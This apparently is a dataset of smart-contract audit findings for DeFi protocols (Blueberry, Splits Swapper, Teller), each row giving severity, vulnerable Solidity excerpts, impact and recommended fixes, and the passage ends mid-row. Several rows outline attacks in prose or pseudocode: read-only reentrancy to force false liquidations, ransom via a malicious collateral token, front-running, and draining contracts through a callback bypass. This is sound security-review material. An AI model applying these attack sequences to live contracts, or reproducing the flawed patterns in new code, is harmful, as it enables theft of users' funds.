Perhaps insert a hook into critical system functions like `BlueBerryBank.liquidate`.\\nAdapt a slightly different read-only solution that checks the Balancer Vault's reentrancy guard without actually entering.",Users choosing Balancer pool positions (such as Aura vaults) as collateral can be prematurely liquidated due to unreliable price data.,"```\\nAttackerContract.flashLoan() ->\\n // Borrow lots of tokens and trigger a callback.\\n SomeProtocol.flashLoan() ->\\n AttackerContract.exploit()\\n\\nAttackerContract.exploit() ->\\n // Join a Balancer Pool using the borrowed tokens and send some ETH along with the call.\\n BalancerVault.joinPool() ->\\n // The Vault will return the excess ETH to the sender, which will reenter this contract.\\n // At this point in the execution, the BPT supply has been updated but the token balances have not.\\n AttackerContract.receive()\\n\\nAttackerContract.receive() ->\\n // Liquidate a position using the same Balancer Pool as collateral.\\n BlueBerryBank.liquidate() ->\\n // Call to the oracle to check the price.\\n BalancerPairOracle.getPrice() ->\\n // Query the token balances. At this point in the execution, these have not been updated (see above).\\n // So, the balances are still the same as before the start of the large pool join.\\n BalancerVaul.getPoolTokens()\\n\\n // Query the BPT supply. 
At this point in the execution, the supply has already been updated (see above).\\n // So, it includes the latest large pool join, and as such the BPT supply has grown by a large amount.\\n BalancerPool.getTotalSupply()\\n\\n // Now the price is computed using both balances and supply, and the result is much smaller than it should be.\\n price = f(balances) / pool.totalSupply()\\n\\n // The position is liquidated under false pretenses.\\n```\\n" +"Deadline check is not effective, allowing outdated slippage and allow pending transaction to be unexpected executed",high,"Deadline check is not effective, allowing outdated slippage and allow pending transaction to be unexpected executed\\nIn the current implementation in CurveSpell.sol\\n```\\n{\\n // 2. Swap rewards tokens to debt token\\n uint256 rewards = _doCutRewardsFee(CRV);\\n _ensureApprove(CRV, address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath,\\n address(this),\\n type(uint256).max\\n );\\n}\\n```\\n\\nthe deadline check is set to type(uint256).max, which means the deadline check is disabled!\\nIn IChiSpell. the swap is directly called on the pool instead of the router\\n```\\nSWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n);\\n```\\n\\nand it has no deadline check for the transaction when swapping",We recommend the protocol use block.timestamp for swapping deadline for Uniswap V2 and swap with Uniswap Router V3 instead of the pool directly!,"AMMs provide their users with an option to limit the execution of their pending actions, such as swaps or adding and removing liquidity. The most common solution is to include a deadline timestamp as a parameter (for example see Uniswap V2 and Uniswap V3). 
If such an option is not present, users can unknowingly perform bad trades:\\nAlice wants to swap 100 tokens for 1 ETH and later sell the 1 ETH for 1000 DAI.\\nThe transaction is submitted to the mempool, however, Alice chose a transaction fee that is too low for miners to be interested in including her transaction in a block. The transaction stays pending in the mempool for extended periods, which could be hours, days, weeks, or even longer.\\nWhen the average gas fee dropped far enough for Alice's transaction to become interesting again for miners to include it, her swap will be executed. In the meantime, the price of ETH could have drastically changed. She will still get 1 ETH but the DAI value of that output might be significantly lower.\\nShe has unknowingly performed a bad trade due to the pending transaction she forgot about.\\nAn even worse way this issue can be maliciously exploited is through MEV:\\nThe swap transaction is still pending in the mempool. Average fees are still too high for miners to be interested in it.\\nThe price of tokens has gone up significantly since the transaction was signed, meaning Alice would receive a lot more ETH when the swap is executed. But that also means that her maximum slippage value (sqrtPriceLimitX96 and minOut in terms of the Spell contracts) is outdated and would allow for significant slippage.\\nA MEV bot detects the pending transaction. Since the outdated maximum slippage value now allows for high slippage, the bot sandwiches Alice, resulting in significant profit for the bot and significant loss for Alice.","```\\n{\\n // 2. 
Swap rewards tokens to debt token\\n uint256 rewards = _doCutRewardsFee(CRV);\\n _ensureApprove(CRV, address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath,\\n address(this),\\n type(uint256).max\\n );\\n}\\n```\\n" +AuraSpell openPositionFarm does not join pool,medium,"The function to open a position for the AuraSpell does not join the pool due to wrong conditional check.\\nThe function deposits collateral into the bank, borrow tokens, and attempts to join the pool:\\n```\\n function openPositionFarm(\\n OpenPosParam calldata param\\n )\\n external\\n existingStrategy(param.strategyId)\\n existingCollateral(param.strategyId, param.collToken)\\n {\\n // rest of code\\n // 1. Deposit isolated collaterals on Blueberry Money Market\\n _doLend(param.collToken, param.collAmount);\\n\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on Balancer, get BPT\\n {\\n IBalancerVault vault = wAuraPools.getVault(lpToken);\\n _ensureApprove(param.borrowToken, address(vault), borrowBalance);\\n\\n (address[] memory tokens, uint256[] memory balances, ) = wAuraPools\\n .getPoolTokens(lpToken);\\n uint[] memory maxAmountsIn = new uint[](2);\\n maxAmountsIn[0] = IERC20(tokens[0]).balanceOf(address(this));\\n maxAmountsIn[1] = IERC20(tokens[1]).balanceOf(address(this));\\n\\n uint totalLPSupply = IBalancerPool(lpToken).totalSupply();\\n // compute in reverse order of how Balancer's `joinPool` computes tokenAmountIn\\n uint poolAmountFromA = (maxAmountsIn[0] * totalLPSupply) /\\n balances[0];\\n uint poolAmountFromB = (maxAmountsIn[1] * totalLPSupply) /\\n balances[1];\\n uint poolAmountOut = poolAmountFromA > poolAmountFromB\\n ? 
poolAmountFromB\\n : poolAmountFromA;\\n\\n bytes32 poolId = bytes32(param.farmingPoolId);\\n if (poolAmountOut > 0) {\\n vault.joinPool(\\n poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n tokens,\\n maxAmountsIn,\\n """",\\n false\\n )\\n );\\n }\\n }\\n // rest of code\\n }\\n```\\n\\nThe function only borrowed one type of tokens from the bank so the contract only owns one type of token. As a result one of the `maxAmountsIn` value is 0. Either `poolAmountFromA` or `poolAmountFromB` is 0 as a result of computation. `poolAmountOut` is the minimal value of `poolAmountFromA` and `poolAmountFromB`, it is 0. The following check `if (poolAmountOut > 0)` will always fail and the pool will never be joined.",It is hard to tell the intent of the developer from this check. Maybe the issue is simply that `poolAmountOut` should be the sum or the max value out of `poolAmountFromA` and `poolAmountFromB` instead of the min.,The rest of the function proceeds correctly without reverting. Users will think they joined the pool and are earning reward while they are not earning anything. This is a loss of funds to the user.,"```\\n function openPositionFarm(\\n OpenPosParam calldata param\\n )\\n external\\n existingStrategy(param.strategyId)\\n existingCollateral(param.strategyId, param.collToken)\\n {\\n // rest of code\\n // 1. Deposit isolated collaterals on Blueberry Money Market\\n _doLend(param.collToken, param.collAmount);\\n\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. 
Add liquidity on Balancer, get BPT\\n {\\n IBalancerVault vault = wAuraPools.getVault(lpToken);\\n _ensureApprove(param.borrowToken, address(vault), borrowBalance);\\n\\n (address[] memory tokens, uint256[] memory balances, ) = wAuraPools\\n .getPoolTokens(lpToken);\\n uint[] memory maxAmountsIn = new uint[](2);\\n maxAmountsIn[0] = IERC20(tokens[0]).balanceOf(address(this));\\n maxAmountsIn[1] = IERC20(tokens[1]).balanceOf(address(this));\\n\\n uint totalLPSupply = IBalancerPool(lpToken).totalSupply();\\n // compute in reverse order of how Balancer's `joinPool` computes tokenAmountIn\\n uint poolAmountFromA = (maxAmountsIn[0] * totalLPSupply) /\\n balances[0];\\n uint poolAmountFromB = (maxAmountsIn[1] * totalLPSupply) /\\n balances[1];\\n uint poolAmountOut = poolAmountFromA > poolAmountFromB\\n ? poolAmountFromB\\n : poolAmountFromA;\\n\\n bytes32 poolId = bytes32(param.farmingPoolId);\\n if (poolAmountOut > 0) {\\n vault.joinPool(\\n poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n tokens,\\n maxAmountsIn,\\n """",\\n false\\n )\\n );\\n }\\n }\\n // rest of code\\n }\\n```\\n" +The protocol will not be able to add liquidity on the curve with another token with a balance.,medium,"The `CurveSpell` protocol only ensure approve curve pool to spend its borrow token. Hence, it will not be able to add liquidity on the curve with another token with a balance.\\nThe `openPositionFarm()` function enables user to open a leveraged position in a yield farming strategy by borrowing funds and using them to add liquidity to a Curve pool, while also taking into account certain risk management parameters such as maximum LTV and position size. When add liquidity on curve ,the protocol use the borrowed token and the collateral token, it checks the number of tokens in the pool and creates an array of the supplied token amounts to be passed to the add_liquidity function. 
Then the curve will transfer the tokens from the protocol and mint lp tokens to the protocol. However, the protocol only ensure approve curve pool to spend its borrow token. Hence, it will not be able to add liquidity on the curve with another token with a balance.\\n```\\n // 3. Add liquidity on curve\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 4) {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n }\\n```\\n",Allow the curve pool to spend tokens that have a balance in the protocol to add liquidity,The protocol will not be able to add liquidity on the curve with another token with a balance.,"```\\n // 3. 
Add liquidity on curve\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 4) {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n }\\n```\\n" +`getPositionRisk()` will return a wrong value of risk,medium,"In order to interact with SPELL the users need to `lend()` some collateral which is known as Isolated Collateral and the SoftVault will deposit them into Compound protocol to generate some lending interest (to earn passive yield)\\nto liquidate a position this function `isLiquidatable()` should return `true`\\n```\\n function isLiquidatable(uint256 positionId) public view returns (bool) {\\n return\\n getPositionRisk(positionId) >=\\n banks[positions[positionId].underlyingToken].liqThreshold;\\n }\\n```\\n\\nand it is subcall to `getPositionRisk()`\\n```\\n function getPositionRisk(\\n uint256 positionId\\n ) public view returns (uint256 risk) {\\n uint256 pv = getPositionValue(positionId); \\n uint256 ov = getDebtValue(positionId); \\n uint256 cv = getIsolatedCollateralValue(positionId);\\n\\n if (\\n (cv == 0 && pv == 0 && ov == 0) || pv >= ov // Closed position or Overcollateralized position\\n ) {\\n risk = 0;\\n } else if (cv == 0) {\\n // Sth bad happened to isolated underlying token\\n risk = Constants.DENOMINATOR;\\n } else {\\n risk = ((ov - pv) * 
Constants.DENOMINATOR) / cv;\\n }\\n }\\n```\\n\\nas we can see the `cv` is a critical value in terms of the calculation of `risk` the `cv` is returned by `getIsolatedCollateralValue()`\\n```\\n function getIsolatedCollateralValue(\\n uint256 positionId\\n ) public view override returns (uint256 icollValue) {\\n Position memory pos = positions[positionId];\\n // NOTE: exchangeRateStored has 18 decimals.\\n uint256 underlyingAmount;\\n if (_isSoftVault(pos.underlyingToken)) {\\n underlyingAmount = \\n (ICErc20(banks[pos.debtToken].bToken).exchangeRateStored() * \\n pos.underlyingVaultShare) /\\n Constants.PRICE_PRECISION; \\n } else {\\n underlyingAmount = pos.underlyingVaultShare;\\n }\\n icollValue = oracle.getTokenValue(\\n pos.underlyingToken,\\n underlyingAmount\\n );\\n }\\n```\\n\\nand it uses `exchangeRateStored()` to ask Compound (CToken.sol) for the exchange rate from `CToken` contract\\n```\\nThis function does not accrue interest before calculating the exchange rate\\n```\\n\\nso the `getPositionRisk()` will return a wrong value of risk because the interest does not accrue for this position",You should use `exchangeRateCurrent()` to accrue interest first.,the user (position) could get liquidated even if his position is still healthy,```\\n function isLiquidatable(uint256 positionId) public view returns (bool) {\\n return\\n getPositionRisk(positionId) >=\\n banks[positions[positionId].underlyingToken].liqThreshold;\\n }\\n```\\n +BlueBerryBank#getPositionValue causes DOS if reward token is added that doesn't have an oracle,medium,"collToken.pendingRewards pulls the most recent reward list from Aura/Convex. In the event that reward tokens are added to pools that don't currently have an oracle then it will DOS every action (repaying, liquidating, etc.). 
While this is only temporary it prevents liquidation which is a key process that should have 100% uptime otherwise the protocol could easily be left with bad debt.\\nBlueBerryBank.sol#L408-L413\\n```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n\\nUsing the pendingRewards method pulls a fresh list of all tokens. When a token is added as a reward but can't be priced then the call to getTokenValue will revert. Since getPostionValue is used in liquidations, it temporarily breaks liquidations which in a volatile market can cause bad debt to accumulate.",Return zero valuation if extra reward token can't be priced.,Temporary DOS to liquidations which can result in bad debt,"```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n" +asking for the wrong address for `balanceOf()`,medium,"ShortLongSpell.openPosition() pass to `_doPutCollateral()` wrong value of `balanceOf()`\\n```\\n // 5. Put collateral - strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nthe balance should be of `address(vault)`","```\\n // 5. 
Put collateral // Remove the line below\\n strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n// Remove the line below\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n// Remove the line below\\n address(this)\\n// Add the line below\\n IERC20Upgradeable(vault).balanceOf(address(this))\\n )\\n );\\n```\\n",`openPosition()` will never work,"```\\n // 5. Put collateral - strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n" +AuraSpell#closePositionFarm requires users to swap all reward tokens through same router,medium,"AuraSpell#closePositionFarm requires users to swap all reward tokens through same router. This is problematic as it is very unlikely that a UniswapV2 router will have good liquidity sources for all tokens and will result in users experiencing forced losses to their reward token.\\nAuraSpell.sol#L193-L203\\n```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAll tokens are forcibly swapped through a single router.",Issue AuraSpell#closePositionFarm requires users to swap all reward tokens through same router\\nAllow users to use an aggregator like paraswap or multiple routers instead of only one single UniswapV2 router.,Users will be forced to swap through a router even if it doesn't have good liquidity for all tokens,"```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n 
address(this),\\n type(uint256).max\\n );\\n }\\n```\\n" +rewardTokens removed from WAuraPool/WConvexPools will be lost forever,medium,"pendingRewards pulls a fresh count of reward tokens each time it is called. This is problematic if reward tokens are ever removed from the the underlying Aura/Convex pools because it means that they will no longer be distributed and will be locked in the contract forever.\\nWAuraPools.sol#L166-L189\\n```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength();\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n\\nIn the lines above we can see that only tokens that are currently available on the pool. 
This means that if tokens are removed then they are no longer claimable and will be lost to those entitled to shares.",Reward tokens should be stored with the tokenID so that it can still be paid out even if the extra rewardToken is removed.,Users will lose reward tokens if they are removed,"```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength();\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n" +"SwapperCallbackValidation doesn't do anything, opens up users to having contracts drained",medium,"The `SwapperCallbackValidation` library that is intended to be used by contracts performing swaps does not provide any protection. As a result, all functions intended to be used only in a callback setting can be called any time by any user. In the provided example of how they expect this library to be used, this would result in the opportunity for all funds to be stolen.\\nThe `SwapperCallbackValidation` library is intended to be used by developers to verify that their contracts are only called in a valid, swapper callback scenario. It contains the following function to be implemented:\\n```\\nfunction verifyCallback(SwapperFactory factory_, SwapperImpl swapper_) internal view returns (bool valid) {\\n return factory_.isSwapper(swapper_);\\n}\\n```\\n\\nThis function simply pings the `SwapperFactory` and confirms that the function call is coming from a verified swapper. 
If it is, we assume that it is from a legitimate callback.\\nFor an example of how this is used, see the (out of scope) UniV3Swap contract, which serves as a model for developers to build contracts to support Swappers.\\n```\\nSwapperImpl swapper = SwapperImpl(msg.sender);\\nif (!swapperFactory.verifyCallback(swapper)) {\\n revert Unauthorized();\\n}\\n```\\n\\nThe contract goes on to perform swaps (which can be skipped by passing empty exactInputParams), and then sends all its ETH (or ERC20s) to `msg.sender`. Clearly, this validation is very important to protect such a contract from losing funds.\\nHowever, if we look deeper, we can see that this validation is not nearly sufficient.\\nIn fact, `SwapperImpl` inherits from `WalletImpl`, which contains the following function:\\n```\\nfunction execCalls(Call[] calldata calls_)\\n external\\n payable\\n onlyOwner\\n returns (uint256 blockNumber, bytes[] memory returnData)\\n{\\n blockNumber = block.number;\\n uint256 length = calls_.length;\\n returnData = new bytes[](length);\\n\\n bool success;\\n for (uint256 i; i < length;) {\\n Call calldata calli = calls_[i];\\n (success, returnData[i]) = calli.to.call{value: calli.value}(calli.data);\\n require(success, string(returnData[i]));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n emit ExecCalls(calls_);\\n}\\n```\\n\\nThis function allows the owner of the Swapper to perform arbitrary calls on its behalf.\\nSince the verification only checks that the caller is, in fact, a Swapper, it is possible for any user to create a Swapper and pass arbitrary calldata into this `execCalls()` function, performing any transaction they would like and passing the `verifyCallback()` check.\\nIn the generic case, this makes the `verifyCallback()` function useless, as any calldata that could be called without that function could similarly be called by deploying a Swapper and sending identical calldata through that Swapper.\\nIn the specific case based on the example provided, this would allow a 
user to deploy a Swapper, call the `swapperFlashCallback()` function directly (not as a callback), and steal all the funds held by the contract.","Issue SwapperCallbackValidation doesn't do anything, opens up users to having contracts drained\\nI do not believe that Swappers require the ability to execute arbitrary calls, so should not inherit from WalletImpl.\\nAlternatively, the verification checks performed by contracts accepting callbacks should be more substantial — specifically, they should store the Swapper they are interacting with's address for the duration of the transaction, and only allow callbacks from that specific address.","All funds can be stolen from any contracts using the `SwapperCallbackValidation` library, because the `verifyCallback()` function provides no protection.","```\\nfunction verifyCallback(SwapperFactory factory_, SwapperImpl swapper_) internal view returns (bool valid) {\\n return factory_.isSwapper(swapper_);\\n}\\n```\\n" +Swapper mechanism cannot incentivize ETH-WETH swaps without risking owner funds,medium,"When `flash()` is called on the Swapper contract, pairs of tokens are passed in consisting of (a) a base token, which is currently held by the contract and (b) a quote token, which is the `$tokenToBeneficiary` that the owner would like to receive.\\nThese pairs are passed to the oracle to get the quoted value of each of them:\\n```\\namountsToBeneficiary = $oracle.getQuoteAmounts(quoteParams_);\\n```\\n\\nThe `UniV3OracleImpl.sol` contract returns a quote per pair of tokens. 
However, since Uniswap pools only consist of WETH (not ETH) and are ordered by token address, it performs two conversions first: `_convert()` converts ETH to WETH for both base and quote tokens, and `_sort()` orders the pairs by token address.\\n```\\nConvertedQuotePair memory cqp = quoteParams_.quotePair._convert(_convertToken);\\nSortedConvertedQuotePair memory scqp = cqp._sort();\\n```\\n\\nThe oracle goes on to check for pair overrides, and gets the `scaledOfferFactor` for the pair being quoted:\\n```\\nPairOverride memory po = _getPairOverride(scqp);\\nif (po.scaledOfferFactor == 0) {\\n po.scaledOfferFactor = $defaultScaledOfferFactor;\\n}\\n```\\n\\nThe `scaledOfferFactor` is the discount being offered through the Swapper to perform the swap. The assumption is that this will be set to a moderate amount (approximately 5%) to incentivize bots to perform the swaps, but will be overridden with a value of ~0% for the same tokens, to ensure that bots aren't paid for swaps they don't need to perform.\\nThe problem is that these overrides are set on the `scqp` (sorted, converted tokens), not the actual token addresses. For this reason, ETH and WETH are considered identical in terms of overrides.\\nTherefore, Swapper owners who want to be paid out in ETH (ie where $tokenToBeneficiary = ETH) have two options:\\nThey can set the WETH-WETH override to 0%, which successfully stops bots from earning a fee on ETH-ETH trades, but will not provide any incentive for bots to swap WETH in the swapper into ETH. This makes the Swapper useless for WETH.\\nThey can keep the WETH-WETH pair at the original ~5%, which will incentivize WETH-ETH swaps, but will also pay 5% to bots for doing nothing when they take ETH out of the contract and return ETH. 
This makes the Swapper waste user funds.\\nThe same issues exist going in the other direction, when `$tokenToBeneficiary = WETH`.","The `scaledOfferFactor` (along with its overrides) should be stored on the Swapper, not on the Oracle.\\nIn order to keep the system modular and logically organized, the Oracle should always return the accurate price for the `scqp`. Then, it is the job of the Swapper to determine what discount is offered for which asset.\\nThis will allow values to be stored in the actual `base` and `quote` assets being used, and not in their converted, sorted counterparts.",Users who want to be paid out in ETH or WETH will be forced to either (a) have the Swapper not function properly for a key pair or (b) pay bots to perform useless actions.,```\\namountsToBeneficiary = $oracle.getQuoteAmounts(quoteParams_);\\n```\\n +CollateralManager#commitCollateral can be called on an active loan,high,"CollateralManager#commitCollateral never checks if the loan has been accepted allowing users to add collaterals after which can DOS the loan.\\nCollateralManager.sol#L117-L130\\n```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue never checks that loan isn't active\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n\\nCollateralManager#commitCollateral does not contain any check that the bidId is pending or at least that it isn't accepted. 
This means that collateral can be committed to an already accepted bid, modifying bidCollaterals.\\n```\\nfunction _withdraw(uint256 _bidId, address _receiver) internal virtual {\\n for (\\n uint256 i;\\n i < _bidCollaterals[_bidId].collateralAddresses.length();\\n i++\\n ) {\\n // Get collateral info\\n Collateral storage collateralInfo = _bidCollaterals[_bidId]\\n .collateralInfo[\\n _bidCollaterals[_bidId].collateralAddresses.at(i)\\n ];\\n // Withdraw collateral from escrow and send it to bid lender\\n ICollateralEscrowV1(_escrows[_bidId]).withdraw(\\n collateralInfo._collateralAddress,\\n collateralInfo._amount,\\n _receiver\\n );\\n```\\n\\nbidCollaterals is used to trigger the withdrawal from the escrow to the receiver, which closing the loan and liquidations. This can be used to DOS a loan AFTER it has already been filled.\\nUser A creates a bid for 10 ETH against 50,000 USDC at 10% APR\\nUser B sees this bid and decides to fill it\\nAfter the loan is accepted, User A calls CollateralManager#commitCollateral with a malicious token they create\\nUser A doesn't pay their loan and it becomes liquidatable\\nUser B calls liquidate but it reverts when the escrow attempts to transfer out the malicious token\\nUser A demands a ransom to return the funds\\nUser A enables the malicious token transfer once the ransom is paid",CollateralManager#commitCollateral should revert if loan is active.,Loans can be permanently DOS'd even after being accepted,"```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue never checks that loan isn't active\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n" +CollateralManager#commitCollateral 
can be called by anyone,high,"CollateralManager#commitCollateral has no access control allowing users to freely add malicious tokens to any bid\\nCollateralManager.sol#L117-L130\\n```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue no access control\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n\\nCollateralManager#commitCollateral has no access control and can be called by anyone on any bidID. This allows an attacker to front-run lenders and add malicious tokens to a loan right before it is filled.\\nA malicious user creates a malicious token that can be transferred once before being paused and returns uint256.max for balanceOf\\nUser A creates a loan for 10e18 ETH against 50,000e6 USDC at 10% APR\\nUser B decides to fill this loan and calls TellerV2#lenderAcceptBid\\nThe malicious user sees this and front-runs with a CollateralManager#commitCollateral call adding the malicious token\\nMalicious token is now paused breaking both liquidations and fully paying off the loan\\nMalicious user leverages this to ransom the locked tokens, unpausing when it is paid","Cause CollateralManager#commitCollateral to revert if called by anyone other than the borrower, their approved forwarder or TellerV2",User can add malicious collateral calls to any bid they wish,"```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue no access control\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n 
Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n" +CollateralManager#commitCollateral overwrites collateralInfo._amount if called with an existing collateral,high,"When duplicate collateral is committed, the collateral amount is overwritten with the new value. This allows borrowers to front-run bid acceptance to change their collateral and steal from lenders.\\nCollateralManager.sol#L426-L442\\n```\\nfunction _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; <- @audit-issue collateral info overwritten\\n emit CollateralCommitted(\\n _bidId,\\n _collateralInfo._collateralType,\\n _collateralInfo._collateralAddress,\\n _collateralInfo._amount,\\n _collateralInfo._tokenId\\n );\\n}\\n```\\n\\nWhen a duplicate collateral is committed it overwrites the collateralInfo for that token, which is used to determine how much collateral to escrow from the borrower.\\nTellerV2.sol#L470-L484\\n```\\nfunction lenderAcceptBid(uint256 _bidId)\\n external\\n override\\n pendingBid(_bidId, ""lenderAcceptBid"")\\n whenNotPaused\\n returns (\\n uint256 amountToProtocol,\\n uint256 amountToMarketplace,\\n uint256 amountToBorrower\\n )\\n{\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n```\\n\\nTellerV2#lenderAcceptBid only allows the lender input the bidId of the bid they wish to accept, not allowing them to specify the expected collateral. 
